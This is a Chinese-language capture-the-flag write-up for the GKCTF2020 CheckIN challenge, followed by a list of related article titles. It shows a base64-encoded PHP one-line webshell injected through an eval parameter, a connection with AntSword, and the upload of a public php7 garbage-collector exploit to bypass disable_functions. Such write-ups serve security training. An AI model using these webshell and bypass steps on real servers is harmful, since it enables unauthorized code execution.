[GKCTF2020]CheckIN详解
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参
首先传参phpinfo();
看看,需要经过base64编码
http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
找到disable_functions,发现过滤了许多危险函数
我们上传一个一句话木马看看
eval($_POST[123]);
,经过base64是ZXZhbCgkX1BPU1RbMTIzXSk7
执行
http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMTIzXSk7
用菜刀,连不上,我呆了,还好有个蚁剑
再试一下,成功了
发现了flag,结果打不开,也修改不了权限
打开readflag看看,有乱码,想到是通过执行readflag来读取flag
然后怎么办,我在不会了。。。
看了大佬的wp后才知道做题要注意版本
通过phpinfo()知道php版本为7.3,这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
下载后进行修改,改为执行readflag
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录
点击此处上传
通过之前的一句话来执行文件包含,得到flag
[GKCTF2020]CheckIN详解相关推荐
- Cobaltstrike系列教程(三)beacon详解
0x000–前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-Beacon详解 1.Beac ...
- .user.ini上传详解附CTF例题
.user.ini上传详解附CTF例题 题目 解法 https://buuoj.cn/challenges#[SUCTF%202019]CheckIn [SUCTF 2019]CheckIn 题目 解 ...
- 详解php://filter以及死亡绕过
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流.标准输入输出和错误描述符, 内存中.磁盘备份的临时文件流 ...
- 从命令行到IDE,版本管理工具Git详解(远程仓库创建+命令行讲解+IDEA集成使用)
首先,Git已经并不只是GitHub,而是所有基于Git的平台,只要在你的电脑上面下载了Git,你就可以通过Git去管理"基于Git的平台"上的代码,常用的平台有GitHub.Gi ...
- JVM年轻代,老年代,永久代详解
秉承不重复造轮子的原则,查看印象笔记分享连接↓↓↓↓ 传送门:JVM年轻代,老年代,永久代详解 速读摘要 最近被问到了这个问题,解释的不是很清晰,有一些概念略微模糊,在此进行整理和记录,分享给大家.在 ...
- docker常用命令详解
docker常用命令详解 本文只记录docker命令在大部分情境下的使用,如果想了解每一个选项的细节,请参考官方文档,这里只作为自己以后的备忘记录下来. 根据自己的理解,总的来说分为以下几种: Doc ...
- 通俗易懂word2vec详解词嵌入-深度学习
https://blog.csdn.net/just_so_so_fnc/article/details/103304995 skip-gram 原理没看完 https://blog.csdn.net ...
- 深度学习优化函数详解(5)-- Nesterov accelerated gradient (NAG) 优化算法
深度学习优化函数详解系列目录 深度学习优化函数详解(0)– 线性回归问题 深度学习优化函数详解(1)– Gradient Descent 梯度下降法 深度学习优化函数详解(2)– SGD 随机梯度下降 ...
- CUDA之nvidia-smi命令详解---gpu
nvidia-smi是用来查看GPU使用情况的.我常用这个命令判断哪几块GPU空闲,但是最近的GPU使用状态让我很困惑,于是把nvidia-smi命令显示的GPU使用表中各个内容的具体含义解释一下. ...
最新文章
- Proovread安装与试用
- 如何理解pytorch 卷积里group 这个参数
- html 表单优化,用CSS3优化HTML5表单的步奏
- Windows的命令行窗口运行Python时,如何清屏?
- SpringCloud介绍(一)
- 函数hook注意事项
- 培养杰出程序员的捷径
- 懒癌晚期学图论的时候自己用C语言写了个求可达性矩阵的算法~
- PHP报错Warning: Unknown: Input variables exceeded 1000
- 字节码指令之对象的创建与访问指令
- 关于本特利内华达状态监测保护系统相关说明
- java中语言转换方法_语言切换的三种方法
- 积分商城使用教程之优惠券
- 二维数组传参 实例详解
- ''' 疯狂填词 创建一个疯狂填词(Mad Libs)程序,它将读入文本文件
- excel高级筛选怎么用_Excel高级筛选系列教程(完整版)-第一期基础功能介绍
- Tapestry经典入门教程
- GPS定位轨迹抽稀之道格拉斯-普克(Douglas-Peuker)算法详解
- Linux ln 命令是什么?C/C++代码实现
- 国内镜像源使用时出现WARNING: The repository located at mirrors.aliyun.com is not a trusted or secure host and
热门文章
- 《技术立国》——日立的小平浪平传
- cocos2dx内存优化
- Gitbook 插件安装 - 导航目录折叠 chapter-fold
- 在System.Timers.Timer的处理程序中调用MessageBox.Show()弹出的确是非模态的
- java推荐书单 什么值得读 (2021年1月8日更新)
- 记录一个问题:$router.push在setTimeout中的使用,显示找不到push
- fluent python 2nd edition_fluent python读书笔记2.2节
- spring+springMVC+mybatis 上篇
- PMP考试常见图表讲解:迭代燃尽图、S曲线图……
- 【C语言习题】统计君君提水的桶数(不使用ceil函数与floor函数)